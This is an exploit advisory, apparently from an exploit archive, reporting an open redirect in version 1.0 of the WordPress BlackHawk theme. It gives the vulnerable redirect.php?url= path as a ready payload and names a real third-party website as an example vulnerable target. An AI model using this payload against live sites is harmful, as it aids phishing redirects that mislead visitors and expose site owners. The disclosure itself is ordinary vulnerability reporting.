WordPress BlackHawk theme version 1.0 suffers from an open redirection vulnerability.
8637148cf6e7634da3d020391c1054f2
#################################################################################################
# Exploit Title : WordPress BlackHawk Themes 1.0 Open Redirection
Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 02/12/2018
# Vendor Homepage : wordpress.org ~ themetix.com/black-hawk/
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Low
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110206
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2268
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31542
# Vulnerability Type : CWE-601 - URL Redirection to Untrusted Site ('Open
Redirect')
#################################################################################################
# Exploit :
/wp-content/themes/blackhawk/library/redirect.php?url=
http://www.REDIRECTIONADDRESS.gov/
#################################################################################################
# Example Vulnerable Site =>
[+]
bhccu.org/wp-content/themes/blackhawk/library/redirect.php?url=https://packetstormsecurity.com/
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################